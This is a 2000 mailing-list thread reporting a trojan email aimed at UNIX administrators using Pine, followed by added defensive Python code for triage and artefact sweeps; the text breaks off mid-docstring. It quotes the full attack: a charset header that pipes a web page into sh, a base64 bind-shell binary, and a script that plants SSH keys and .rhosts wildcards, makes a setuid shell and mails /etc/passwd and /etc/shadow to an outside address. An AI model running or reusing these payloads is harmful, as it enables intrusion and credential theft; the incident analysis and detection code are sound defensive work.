TrojanHorse for UNIX?

Karel Kovar kkovar@salto.cz
Wednesday, May 24, 19:29:10 CEST 2000


Hi,
I spotted this in another mailing list. It fits the recent debate about viruses
in e-mail, doesn't it? :-)

Karel Kovar

Voyage Io wrote:
> 
> Hi Tang,
> 
> Thanks for your information.
> 
> It probably is a new virus (found only after 16 May) which is especially
> designed for UNIX administrators who like to use PINE as the Email client.
> 
> You can find more discussion in the newsgroup... for example,
> 
> http://x42.deja.com/getdoc.xp?AN=624410603&search=thread&CONTEXT=958548790.554172430&HIT_CONTEXT=958548790.554172430&HIT_NUM=1&hitnum=0
> 
> Best regards,
> Voyage
> ------------------------------------------------------------------------------
> Io Hio Hong, Voyage
> 
> CI, Centro de Informatica     (http://www-ci.ipm.edu.mo)
> Macau Polytechnic Institute   (http://www.ipm.edu.mo)
> Tel: 5996175                   Fax: 530505
> Email: voyage@ipm.edu.mo       ICQ: 4050204
> 
> On Wed, 17 May 2000, Tang wrote:
> 
> > Hello,
> >
> >     I received an email addressed to root with strange contents. The
> > whole email is shown for your reference.
> >     When I read the logs attached with the mail, I don't find anything
> > (ip address, dns) relating to our domain.
> >
> >     Then I try to find out where the email is from, so I point my browser to
> > http://tofan.onza.net. The browser outputs a page of shell scripts and
> > program code! They are also attached at the end of this mail. Then I start
> > to scan the whole email carefully, and find a line of strange Content-Type
> > statement as follows:
> >
> >     Content-Type: TEXT/PLAIN;
> > charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> > name="emailf" Content-Transfer-Encoding: BASE64
> >
> >     Looks like it starts Lynx to browse the page with the suspicious code,
> > then runs the code to steal the /etc/passwd file!
> >
> >     Seems like my Pine didn't run Lynx automatically..... but I'm not sure
> > of the harm to us yet!
> >
> >     Do you ever receive some email like this? Any comments?
> >
> > regards,
> > Tang.
> >
> > UMac, INESC Macau
> > R.A.
> >
> >
> > ============================== Beginning of email =============================
> > >From root@tofan.onza.net  Mon May 15 15:18:55 2000
> > Received: from mars.fontijne.nl (smtp.fontijne.nl [195.7.212.130])
> >  by inesc-macau.org.mo (8.9.2/8.9.2/Debian/GNU) with ESMTP id PAA16075
> >  for <root@neptune.inesc-macau.org.mo>; Mon, 15 May 2000 15:16:41 +0800
> > (CST)
> > Received: from Bastion.Fontijne.nl (195.7.212.131 [195.7.212.131]) by
> > mars.fontijne.nl with SMTP (Microsoft Exchange Internet Mail Service
> > Version 5.5.2650.21)
> >  id K69W8LSQ; Mon, 15 May 2000 08:55:41 +0200
> > Received: from atl-qbu-zpn-vty3.as.wcom.net ([216.192.215.3]) by
> > Bastion.Fontijne.nl; Mon, 15 May 2000 08:48:49 +0000 (GMT)
> > Message-ID: <Pine.LNX.4.10.9909171428170.28464-100000@tofan.onza.net>
> > Date: Sat, 13 May 2000 21:15:05 -0400 (EDT)
> > From: root <root@tofan.onza.net>
> > Subject: DOS attack, log file attached!
> > MIME-Version: 1.0
> > To: root@tofan.onza.net
> > Content-Type: MULTIPART/MIXED;
> > BOUNDARY="-1463811839-1047689522-958180505=:1450"
> > Status: RO
> > X-Status:
> >
> >   This message is in MIME format.  The first part should be readable
> > text,
> >   while the remaining parts are likely unreadable without MIME-aware
> > tools.
> >   Send mail to mime@docserver.cac.washington.edu for more info.
> >
> > ---1463811839-1047689522-958180505=:1450
> > Content-Type: TEXT/PLAIN; charset=US-ASCII
> >
> > THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED ON A
> > SECURITIES AND EXCHANGE COMMISION INTERNET FIREWALL
> > FROM YOUR DOMAIN.
> > AN EXCERPT FROM OUR LOGS IS ATTACHED BELOW.
> > ALL TIMES ARE US EASTERN AND ARE SYNCED WITH NTP.
> >
> > Jerry Leininser
> > cops@tofan.onza.net
> >
> > ---2463811839-1047689522-958180505=:1450
> > Content-Type: APPLICATION/octet-stream;
> > name="log.txt.tofan.onza.net.exit"
> > Content-Transfer-Encoding: BASE64
> > Content-ID: <Pine.LNX.4.10.1000512211505.1450B@tofan.onza.net>
> > Content-Description:
> >
> > f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAkIYECDQAAABcDAAAAAAAADQAIAAF
> > ACgAFwAUAAYAAAA0AAAANIAECDSABAigAAAAoAAAAAUAAAAEAAAAAwAAANQA
> > AADUgAQI1IAECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQITQoA
> > AE0KAAAFAAAAABAAAAEAAABQCgAAUJoECFCaBAj0AAAA+AAAAAYAAAAAEAAA
> > AgAAALwKAAC8mgQIvJoECIgAAACIAAAABgAAAAQAAAAvbGliL2xkLWxpbnV4
> > LnNvLjEAABEAAAAfAAAAAAAAABwAAAAWAAAAGgAAABkAAAAAAAAADQAAABEA
> > AAATAAAACgAAAAkAAAAYAAAAAQAAABcAAAAOAAAAFAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAUAAAACAAAAAAAAAAcAAAAAAAAA
> > CAAAAAAAAAAAAAAACwAAAAAAAAAGAAAAEAAAAAAAAAASAAAAFQAAAB4AAAAd
> > AAAAGwAAAAAAAAADAAAADwAAAAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAsA
> > AABYhQQIHgAAABIAAAASAAAAaIUECCgAAAAiAAAAGQAAALyaBAgAAAAAEQDx
> > /yIAAAB4hQQIfgAAABIAAAAoAAAAiIUECAAAAAAiAAAALQAAAJiFBAheAAAA
> > IgAAADQAAABQmgQIBAAAABEADAA+AAAAqIUECDYAAAASAAAARAAAALiFBAhm
> > AAAAIgAAAEkAAABAhQQIAAAAABIABwBPAAAAyIUECF4AAAAiAAAAVgAAANiF
> > BAhGAAAAEgAAAGIAAABQmgQIBAAAACAADABqAAAA6IUECF4AAAAiAAAAbwAA
> > AESbBAgCAAAAEQARAH0AAAD4hQQIVAAAABIAAACEAAAACIYECFYAAAAiAAAA
> > iwAAABiGBAgAAAAAIgAAAJAAAACQiQQIAAAAABIACgCWAAAAKIYECDQAAAAS
> > AAAAnQAAAGSaBAgAAAAAEQDx/7MAAAA4hgQIDQAAACIAAAC5AAAASIYECIAA
> > AAASAAAAvgAAAFiGBAg+AAAAEgAAAMkAAABohgQIwAAAABIAAADQAAAAeIYE
> > CAAAAAAiAAAA1gAAAIyJBAgAAAAAEQDx/90AAABEmwQIAAAAABEA8f/kAAAA
> > RJsECAAAAAARAPH/8AAAAEibBAgAAAAAEQDx/wBsaWJjLnNvLjUAc3RyY3B5
> > AHByaW50ZgBfRFlOQU1JQwBleGVjbABkdXAyAHNvY2tldABfX2Vudmlyb24A
> > Ynplcm8Ac2VuZABfaW5pdABhY2NlcHQAX19saWJjX2luaXQAZW52aXJvbgBi
> > aW5kAF9fZnB1X2NvbnRyb2wAc2lnbmFsAGxpc3RlbgBmb3JrAF9maW5pAGF0
> > ZXhpdABfR0xPQkFMX09GRlNFVF9UQUJMRV8AaHRvbnMAZXhpdABfX3NldGZw
> > dWN3AHN0cmxlbgBjbG9zZQBfZXRleHQAX2VkYXRhAF9fYnNzX3N0YXJ0AF9l
> > bmQAAAAARJsECAUPAABwmgQIBwEAAHSaBAgHAgAAeJoECAcEAAB8mgQIBwUA
> > AICaBAgHBgAAhJoECAcIAACImgQIBwkAAIyaBAgHCwAAkJoECAcMAACUmgQI
> > Bw4AAJiaBAgHEAAAnJoECAcRAACgmgQIBxIAAKSaBAgHFAAAqJoECAcWAACs
> > mgQIBxcAALCaBAgHGAAAtJoECAcZAAC4mgQIBxoAAAAAAAAAAAAA6CMEAADC
> > AAD/NWiaBAj/JWyaBAgAAAAA/yVwmgQIaAAAAADp4P////8ldJoECGgIAAAA
> > 6dD/////JXiaBAhoEAAAAOnA/////yV8mgQIaBgAAADpsP////8lgJoECGgg
> > AAAA6aD/////JYSaBAhoKAAAAOmQ/////yWImgQIaDAAAADpgP////8ljJoE
> > CGg4AAAA6XD/////JZCaBAhoQAAAAOlg/////yWUmgQIaEgAAADpUP////8l
> > mJoECGhQAAAA6UD/////JZyaBAhoWAAAAOkw/////yWgmgQIaGAAAADpIP//
> > //8lpJoECGhoAAAA6RD/////JaiaBAhocAAAAOkA/////yWsmgQIaHgAAADp
> > 8P7///8lsJoECGiAAAAA6eD+////JbSaBAhoiAAAAOnQ/v///yW4mgQIaJAA
> > AADpwP7//wAAAAAAAAAAWYnjieCJygHSAdIB0IPABDHtVVVVieVQU1G4iAAA
> > ALsAAAAAzYCLRCQIo1CaBAgPtwVEmwQIUOiM////g8QE6AT///9okIkECOhK
> > ////g8QE6Fr+///oSQAAAFDoV////1uNtCYAAAAAjbQmAAAAALgBAAAAzYDr
> > 9420JgAAAABTu2CaBAiDPWCaBAgAdA2QiwP/0IPDBIM7AHX0W8ONNsOQkJBV
> > ieWD7DjHRfyYiQQIx0X4pokECMdF9MyJBAjoxP7//4nAhcB0CmoB6Of+//+D
> > xARmx0XYAgBoOTAAAOjE/v//g8QEicBmiUXax0XcAAAAAGoIjUXYjVAIUugW
> > /v//g8QIaPeJBAiLRQyLEFLos/3//4PECGoBahHoR/7//4PECGoAagFqAujZ
> > /f//g8QMicCJRfCDffAAfRtoDYoECOiR/f//g8QEicBQ6Gb+//+DxASNdgBq
> > EI1F2FCLRfBQ6PH9//+DxAyJwIXAfRhoG4oECOhe/f//g8QEicBQ6DP+//+D
> > xARqBYtF8FDo5f3//4PECInAhcB9GGgnigQI6DL9//+DxASJwFDoB/7//4PE
> > BMdF6BAAAACNRehQjUXIUItF8FDobP3//4PEDInAiUXsg33sAH0aaDWKBAjo
> > 9Pz//4PEBInAUOjJ/f//g8QEjTboj/3//4nAhcAPhL0AAABqAItF/FDoyv3/
> > /4PEBInAUItF/FCLRexQ6Af9//+DxBBqAItF+FDoqf3//4PEBInAUItF+FCL
> > RexQ6Ob8//+DxBBqAItF9FDoiP3//4PEBInAUItF9FCLRexQ6MX8//+DxBBq
> > AItF7FDoh/z//4PECGoBi0XsUOh5/P//g8QIagKLRexQ6Gv8//+DxAhqAGhC
> > igQIaEWKBAhoRYoECOhC/P//g8QQi0XsUOg2/f//g8QEagDo/Pz//4PEBJCL
> > RexQ6B/9//+DxATp6v7//412AMnDkJBTu1SaBAiDPVSaBAj/dA2QiwP/0IPD
> > /IM7/3X0W8ONNsOQkJAAAAAA6Hv9///CAAAKQ29ubmVjdGVkIQoKAFRoaXMg
> > ZmluZSB0b29sIGNvZGVkIGJ5IEJyb25jIEJ1c3RlcgoAUGxlYXNlIGVudGVy
> > IGVhY2ggY29tbWFuZCBmb2xsb3dlZCBieSAnOycKAElfZGlkX25vdF9jaGFu
> > Z2VfSElERQBTb2NrZXQgZXJyb3IKAEJpbmQgZXJyb3IKAExpc3RlbiBlcnJv
> > cgoAQWNjZXB0IGVycm9yAC1pAC9iaW4vc2gAAAAAAAAAAP////8AAAAA////
> > /wAAAAC8mgQIAAAAAAAAAABehQQIboUECH6FBAiOhQQInoUECK6FBAi+hQQI
> > zoUECN6FBAjuhQQI/oUECA6GBAgehgQILoYECD6GBAhOhgQIXoYECG6GBAh+
> > hgQIAQAAAAEAAAAMAAAAQIUECA0AAACQiQQIBAAAAOiABAgFAAAAoIMECAYA
> > AACwgQQICgAAAPUAAAALAAAAEAAAABUAAAAAAAAAAwAAAGSaBAgCAAAAmAAA
> > ABQAAAARAAAAFwAAAKCEBAgRAAAAmIQECBIAAAAIAAAAEwAAAAgAAAAAAAAA
> > AAAAAABHQ0M6IChHTlUpIDIuNy4yLjEAAEdDQzogKEdOVSkgMi43LjIuMQAA
> > R0NDOiAoR05VKSAyLjcuMi4xAAgAAAAAAAAAAQAAADAxLjAxAAAACAAAAAAA
> > AAABAAAAMDEuMDEAAAAIAAAAAAAAAAEAAAAwMS4wMQAAAAAuc3ltdGFiAC5z
> > dHJ0YWIALnNoc3RydGFiAC5pbnRlcnAALmhhc2gALmR5bnN5bQAuZHluc3Ry
> > AC5yZWwuYnNzAC5yZWwucGx0AC5pbml0AC5wbHQALnRleHQALmZpbmkALnJv
> > ZGF0YQAuZGF0YQAuY3RvcnMALmR0b3JzAC5nb3QALmR5bmFtaWMALmJzcwAu
> > Y29tbWVudAAubm90ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAGwAAAAEAAAACAAAA1IAECNQAAAATAAAAAAAAAAAAAAABAAAA
> > AAAAACMAAAAFAAAAAgAAAOiABAjoAAAAyAAAAAMAAAAAAAAABAAAAAQAAAAp
> > AAAACwAAAAIAAACwgQQIsAEAAPABAAAEAAAAAQAAAAQAAAAQAAAAMQAAAAMA
> > AAACAAAAoIMECKADAAD1AAAAAAAAAAAAAAABAAAAAAAAADkAAAAJAAAAAgAA
> > AJiEBAiYBAAACAAAAAMAAAARAAAABAAAAAgAAABCAAAACQAAAAIAAACghAQI
> > oAQAAJgAAAADAAAACAAAAAQAAAAIAAAASwAAAAEAAAAGAAAAQIUECEAFAAAI
> > AAAAAAAAAAAAAAAQAAAAAAAAAFEAAAABAAAABgAAAEiFBAhIBQAAQAEAAAAA
> > AAAAAAAABAAAAAQAAABWAAAAAQAAAAYAAACQhgQIkAYAAPwCAAAAAAAAAAAA
> > ABAAAAAAAAAAXAAAAAEAAAAGAAAAkIkECJAJAAAIAAAAAAAAAAAAAAAQAAAA
> > AAAAAGIAAAABAAAAAgAAAJiJBAiYCQAAtQAAAAAAAAAAAAAAAQAAAAAAAABq
> > AAAAAQAAAAMAAABQmgQIUAoAAAQAAAAAAAAAAAAAAAQAAAAAAAAAcAAAAAEA
> > AAADAAAAVJoECFQKAAAIAAAAAAAAAAAAAAAEAAAAAAAAAHcAAAABAAAAAwAA
> > AFyaBAhcCgAACAAAAAAAAAAAAAAABAAAAAAAAAB+AAAAAQAAAAMAAABkmgQI
> > ZAoAAFgAAAAAAAAAAAAAAAQAAAAEAAAAgwAAAAYAAAADAAAAvJoECLwKAACI
> > AAAABAAAAAAAAAAEAAAACAAAAIwAAAAIAAAAAwAAAESbBAhECwAABAAAAAAA
> > AAAAAAAABAAAAAAAAACRAAAAAQAAAAAAAAAAAAAARAsAADwAAAAAAAAAAAAA
> > AAEAAAAAAAAAmgAAAAcAAAAAAAAAPAAAAIALAAA8AAAAAAAAAAAAAAABAAAA
> > AAAAABEAAAADAAAAAAAAAAAAAAC8CwAAoAAAAAAAAAAAAAAAAQAAAAAAAAAB
> > AAAAAgAAAAAAAAssssssssssssssssssssssKQAAAAQAAAAQAAAACQAAAAMA
> > AAAAAAAAAAAAAJQUAAC+AQAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAA
> > AAAAAAAAAAAAAAAAAAAAAAADAAEAAAAAAAAAAAAAAAAAAwACAAAAAAAAAAAA
> > AAAAAAMAAwAAAAAAAAAAAAAAAAADAAQAAAAAAAAAAAAAAAAAAwAFAAAAAAAA
> > AAAAAAAAAAMABgAAAAAAAAAAAAAAAAADAAcAAAAAAAAAAAAAAAAAAwAIAAAA
> > AAAAAAAAAAAAAAMACQAAAAAAAAAAAAAAAAADAAoAAAAAAAAAAAAAAAAAAwAL
> > AAAAAAAAAAAAAAAAAAMADAAAAAAAAAAAAAAAAAADAA0AAAAAAAAAAAAAAAAA
> > AwAOAAAAAAAAAAAAAAAAAAMADwAAAAAAAAAAAAAAAAADABAAAAAAAAAAAAAA
> > AAAAAwARAAAAAAAAAAAAAAAAAAMAEgAAAAAAAAAAAAAAAAADABMAAAAAAAAA
> > AAAAAAAAAwAUAAAAAAAAAAAAAAAAAAMAFQAAAAAAAAAAAAAAAAADABYAAQAA
> > AAAAAAAAAAAABADx/wwAAABoiQQIAAAAAAAACQAbAAAAaIkECAAAAAACAAkA
> > MQAAAFiaBAgAAAAAAQANAD4AAACIiQQIAAAAAAIACQBJAAAAVJoECAAAAAAB
> > AAwAVwAAAGCaBAgAAAAAAQAOAGQAAAAAAAAAAAAAAAQA8f9rAAAAAIcECAAA
> > AAAAAAkAAQAAAAAAAAAAAAAABADx/wwAAAAQhwQIAAAAAAAACQBwAAAAEIcE
> > CAAAAAACAAkAhgAAAFyaBAgAAAAAAQAOAJQAAAAwhwQIAAAAAAIACQBJAAAA
> > VJoECAAAAAABAAwAnwAAAFSaBAgAAAAAAQANAK0AAAAAAAAAAAAAAAQA8f8M
> > AAAANIcECAAAAAAAAAkAuQAAAFiFBAgeAAAAEgAAAMAAAABohQQIKAAAACIA
> > AADHAAAAvJoECAAAAAARAPH/0AAAAIyJBAgAAAAAEQDx/9cAAAB4hQQIfgAA
> > ABIAAADdAAAAiIUECAAAAAAiAAAA4gAAAJiFBAheAAAAIgAAAOkAAABQmgQI
> > BAAAABEADADzAAAAqIUECDYAAAASAAAA+QAAALiFBAhmAAAAIgAAAP4AAABA
> > hQQIAAAAABIABwAEAQAAyIUECF4AAAAiAAAACwEAANiFBAhGAAAAEgAAABcB
> > AABQmgQIBAAAACAADAAfAQAA6IUECF4AAAAiAAAAJAEAAESbBAgCAAAAEQAR
> > ADIBAACQhgQIgAAAABIACQA5AQAA+IUECFQAAAASAAAAQAEAAJCGBAgAAAAA
> > EAAJAE8BAAAIhgQIVgAAACIAAABWAQAAGIYECAAAAAAiAAAAWwEAAESbBAgA
> > AAAAEQDx/2cBAAA0hwQIMgIAABIACQBsAQAAkIkECAAAAAASAAoAcgEAACiG
> > BAg0AAAAEgAAAHkBAABEmwQIAAAAABEA8f+AAQAAZJoECAAAAAARAPH/lgEA
> > AEibBAgAAAAAEQDx/5sBAAA4hgQIDQAAACIAAAChAQAASIYECIAAAAASAAAA
> > pgEAAFiGBAg+AAAAEgAAALEBAABohgQIwAAAABIAAAC4AQAAeIYECAAAAAAi
> > AAAAAGNydHN0dWZmLmMAZ2NjMl9jb21waWxlZC4AX19kb19nbG9iYWxfY3Rv
> > cnNfYXV4AF9fQ1RPUl9FTkRfXwBpbml0X2R1bW15AGZvcmNlX3RvX2RhdGEA
> > X19EVE9SX0VORF9fAGNydDAuUwBkb25lAF9fZG9fZ2xvYmFsX2R0b3JzX2F1
> > eABfX0RUT1JfTElTVF9fAGZpbmlfZHVtbXkAX19DVE9SX0xJU1RfXwBibGFj
> > a2hvbGUuYwBzdHJjcHkAcHJpbnRmAF9EWU5BTUlDAF9ldGV4dABleGVjbABk
> > dXAyAHNvY2tldABfX2Vudmlyb24AYnplcm8Ac2VuZABfaW5pdABhY2NlcHQA
> > X19saWJjX2luaXQAZW52aXJvbgBiaW5kAF9fZnB1X2NvbnRyb2wAX3N0YXJ0
> > AHNpZ25hbABfX19jcnRfZHVtbXlfXwBsaXN0ZW4AZm9yawBfX2Jzc19zdGFy
> > dABtYWluAF9maW5pAGF0ZXhpdABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFC
> > TEVfAF9lbmQAaHRvbnMAZXhpdABfX3NldGZwdWN3AHN0cmxlbgBjbG9zZQA=
> > ---2463811839-1047689522-958180505=:1450--
> > ---1463811839-1047689522-958180505=:1450
> > Content-Type: TEXT/PLAIN;
> > charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
> > name="emailf" Content-Transfer-Encoding: BASE64
> > Content-Description: THE LOGS
> > Content-Disposition: attachment; filename="emailf"
> >
> >
> >
> >
> >
> >
> >
> >
> > PLEASE FORGIVE US IF YOUR SYSTEM WAS ERRORNEOUSLY ACUSED,
> > WE HAVE FACED A KERNEL PANIC!
> >
> > Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> >               206.121.213.44:8080 L=60 S=0x00 I=63749 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:24 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> >               206.121.213.44:8080 L=60 S=0x00 I=63928 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:30 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> >               206.121.213.44:8080 L=60 S=0x00 I=64281 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:42 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> >               206.121.213.44:8080 L=60 S=0x00 I=64978 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:45 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1389 \
> >               206.121.213.44:8080 L=60 S=0x00 I=65097 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:48 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1389 \
> >               206.121.213.44:8080 L=60 S=0x00 I=65205 F=0x0040 T=55
> > .S....
> > Sep 16 17:29:54 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1389 \
> >               206.121.213.44:8080 L=60 S=0x00 I=22 F=0x0040 T=55 .S....
> > Sep 16 17:30:05 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1412 \
> >               206.121.213.44:8080 L=60 S=0x00 I=775 F=0x0040 T=55 .S....
> >
> > Sep 16 17:30:06 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1371 \
> >               206.121.213.44:8080 L=60 S=0x00 I=787 F=0x0040 T=55 .S....
> >
> > Sep 16 17:30:11 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1412 \
> >               206.121.213.44:8080 L=60 S=0x00 I=1014 F=0x0040 T=55
> > .S....
> > Sep 16 17:30:21 secfw3 kernel: IP fw-in deny eth1 TCP
> > 209.16.136.144:1423 \
> >               206.121.213.44:8080 L=60 S=0x00 I=1438 F=0x0040 T=55
> > .S....
> >
> >
> > ---1463811839-1047689522-958180505=:1450--
> >
> > ================================ End of email ==============================
> >
> >
> >
> >
> > ============================== Source of web page ==============================
> > grep "x4334@AGRI" ~/.ssh/authorized_keys >/dev/null 2>&1 || if [ 0 ];
> > then
> > if [ ! -d ~/.ssh ]
> > then umask 022 >/dev/null 2>&1;mkdir ~/.ssh >/dev/null 2>&1
> > echo "+ +" >> ~/.rhosts 2>/dev/null
> > fi
> > umask 022 >/dev/null 2>&1
> > echo "512 35 9785877609308338986917478061014184970982460312434529051173539551539508793288925026879592531038110506684705572154197270221242712482140435531967239855453591 x4334@AGRI" >> ~/.ssh/authorized_keys 2>/dev/null
> > cat << __EOF__ > /tmp/io.c
> > #define PORT 56789
> > #include <stdio.h>
> > #include <signal.h>
> > #include <sys/types.h>
> > #include <sys/socket.h>
> > #include <netinet/in.h>
> >
> > int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
> > struct sockaddr_in serv_addr;
> > struct sockaddr_in client_addr;
> >
> > int main (int argc, char **argv)
> > {
> >
> >     soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
> >     if (soc_des == -1)
> >         exit(-1);
> >     bzero((char *) &serv_addr, sizeof(serv_addr));
> > strcpy(argv[0],"updated");
> >     serv_addr.sin_family = AF_INET;
> >     serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
> >     serv_addr.sin_port = htons(PORT);
> >     soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr,
> > sizeof(serv_addr));
> >     if (soc_rc != 0)
> >         exit(-1);
> >     if (fork() != 0)
> >         exit(0);
> >     setpgrp();
> >     signal(SIGHUP, SIG_IGN);
> >     if (fork() != 0)
> >         exit(0);
> >     soc_rc = listen(soc_des, 5);
> >     if (soc_rc != 0)
> >         exit(0);
> >     while (1) {
> >         soc_len = sizeof(client_addr);
> >         soc_cli = accept(soc_des, (struct sockaddr *) &client_addr,
> > &soc_len);
> >         if (soc_cli < 0)
> >             exit(0);
> >         cli_pid = getpid();
> >         server_pid = fork();
> >         if (server_pid != 0) {
> >             dup2(soc_cli,0);
> >             dup2(soc_cli,1);
> >             dup2(soc_cli,2);
> >             execl("/bin/sh","sh", "-i",(char *)0);
> >             close(soc_cli);
> >             exit(0);
> >         }
> >     close(soc_cli);
> >     }
> > }
> > __EOF__
> > gcc -o /tmp/io /tmp/io.c >/dev/null 2>&1
> > /tmp/io >/dev/null 2>&1 ||mkdir /tmp/.pkoss493 >/dev/null 2>&1&&cp /bin/sh /tmp/.pkoss493/.rc >/dev/null 2>&1;chmod 4715 /tmp/.pkoss493/.rc >/dev/null 2>&1
> > rm -rf /tmp/io.c
> > rm -rf /tmp/io
> > mail -s hhp000 bjern3@attglobal.net >/dev/null 2>&1 < /etc/passwd
> > echo "`hostname -i  2>&1` - `id  2>&1`- `uname -a  2>&1`- `ls -al ~ 2>&1` - `cat /etc/shadow 2>&1`" | mail -s hhp001 bjern3@attglobal.net 2>/dev/null
> > chmod og-w ~ >/dev/null 2>&1
> > chmod og-w ~/.ssh >/dev/null 2>&1
> > fi
> > ============================== End of source of web page ==========================
> >
> >
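The two tricks in the mail Tang quotes above can be checked mechanically. The following is an added example, not code from the thread or from Pine: it parses a raw message with Python's `email` module, flags any `Content-*` header parameter that carries shell tokens (a backtick, `${IFS}`, `$(`, or a pipe, none of which are legal in an RFC 2045 parameter), and looks for an ELF image either as a decoded attachment or as base64 text sitting inside a text body. The sample message is constructed from the headers on the page and trimmed. It keeps the mismatched second delimiter as the mail has it (the attachment's delimiter starts `---2463…` while the declared boundary is `-1463…`, so a MIME parser sees the whole `APPLICATION/octet-stream` block as text inside the first part), and its single base64 line is the first line of the quoted attachment, which decodes to `\x7fELF`: a 32-bit little-endian `ET_EXEC` image for `EM_386`.

```python
"""Triage of a raw message for the two tricks in the quoted mail.

Added example; not code from the thread.  SAMPLE is constructed from the
headers quoted on the page (trimmed); its one base64 line is the first line
of the quoted attachment.
"""
import base64
import binascii
import email
import re
import struct

# Tokens that never occur in a valid RFC 2045 parameter (charset, name,
# boundary ...) but that a shell acts on.  The quoted header used backticks
# and ${IFS} (a whitespace stand-in that survives header tokenisation) to
# get `lynx -source tofan.onza.net | sh` into a shell.
SHELL_META = re.compile(r"`|\$\{IFS\}|\$\(|\|")
ELF_MAGIC = b"\x7fELF"
ELF_B64_PREFIX = b"f0VMRg"      # base64 of b"\x7fELF" at offset 0

SAMPLE = """\
From: root <root@tofan.onza.net>
Subject: DOS attack, log file attached!
MIME-Version: 1.0
To: root@tofan.onza.net
Content-Type: MULTIPART/MIXED;
 BOUNDARY="-1463811839-1047689522-958180505=:1450"

  This message is in MIME format.

---1463811839-1047689522-958180505=:1450
Content-Type: TEXT/PLAIN; charset=US-ASCII

THIS IS TO INFORM YOU THAT A DOS ATTACK WAS LOGGED.

---2463811839-1047689522-958180505=:1450
Content-Type: APPLICATION/octet-stream;
 name="log.txt.tofan.onza.net.exit"
Content-Transfer-Encoding: BASE64

f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAkIYECDQAAABcDAAAAAAAADQAIAAF
---2463811839-1047689522-958180505=:1450--
---1463811839-1047689522-958180505=:1450
Content-Type: TEXT/PLAIN;
 charset=``lynx${IFS}-source${IFS}tofan.onza.net|sh|exit``; name="log"
 name="emailf" Content-Transfer-Encoding: BASE64
Content-Description: THE LOGS
Content-Disposition: attachment; filename="emailf"

Sep 16 17:29:21 secfw3 kernel: IP fw-in deny eth1 TCP 209.16.136.144:1371

---1463811839-1047689522-958180505=:1450--
"""


def header_injections(msg):
    """(header, raw value, first offending token) for every Content-* header
    in any MIME part whose raw, still-folded value contains shell tokens."""
    hits = []
    for part in msg.walk():
        for name, value in part.items():
            if name.lower().startswith("content-"):
                m = SHELL_META.search(str(value))
                if m:
                    hits.append((name, str(value), m.group(0)))
    return hits


def elf_summary(data):
    """Class/type/machine of an ELF header, or None if data is not ELF."""
    if len(data) < 20 or not data.startswith(ELF_MAGIC):
        return None
    order = "<" if data[5] == 1 else ">"          # EI_DATA: 1 = LSB, 2 = MSB
    e_type, e_machine = struct.unpack_from(order + "HH", data, 16)
    return {"class": {1: "ELF32", 2: "ELF64"}.get(data[4], "?"),
            "type": {2: "EXEC", 3: "DYN"}.get(e_type, str(e_type)),
            "machine": {3: "i386", 62: "x86-64"}.get(e_machine, str(e_machine))}


def executable_parts(msg):
    """(part index, how, summary) for every leaf part carrying an ELF image,
    either as its decoded payload or as a base64 line inside a text body,
    which is where the quoted mail's attachment lands because its delimiter
    does not match the declared boundary."""
    hits = []
    for idx, part in enumerate(msg.walk()):
        if part.is_multipart():
            continue
        data = part.get_payload(decode=True) or b""
        summary = elf_summary(data)
        if summary:
            hits.append((idx, "payload", summary))
            continue
        for line in data.splitlines():
            if line.startswith(ELF_B64_PREFIX):
                try:
                    summary = elf_summary(base64.b64decode(line))
                except (binascii.Error, ValueError):
                    continue
                if summary:
                    hits.append((idx, "base64-in-body", summary))
                    break
    return hits


def triage(raw):
    """Parse one raw message and run both checks."""
    msg = email.message_from_string(raw)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    return {"parts": len(leaves),
            "header_injections": header_injections(msg),
            "elf": executable_parts(msg)}


if __name__ == "__main__":
    for key, val in triage(SAMPLE).items():
        print(key, val)
```

Run it against a saved copy of the message (`triage(open("msg.txt").read())`); a hit in `header_injections` is the lynx-pipe-to-sh line, and `elf` tells you the "log" is an executable before anyone opens it.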



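The script served from the web page (quoted above) leaves four artefacts on a host where it ran: an extra line in `~/.ssh/authorized_keys` whose comment is `x4334@AGRI`, a `+ +` wildcard in `~/.rhosts`, a listener on TCP port 56789 (the `PORT` in io.c; the process renames itself `updated`), and, when the compile failed, a setuid copy of `/bin/sh` at `/tmp/.pkoss493/.rc`. The sweep below is an added example, not code from the thread; the identifiers come from the quoted script and nothing else is assumed. `demo()` plants the artefacts in a scratch directory (a placeholder key modulus, a stand-in shell file, and a fabricated `/proc/net/tcp` line) so the checks can be exercised without a compromised box.

```python
"""Host sweep for the artefacts left by the script quoted on the page.

Added example; not code from the thread.  Identifiers (key comment, port,
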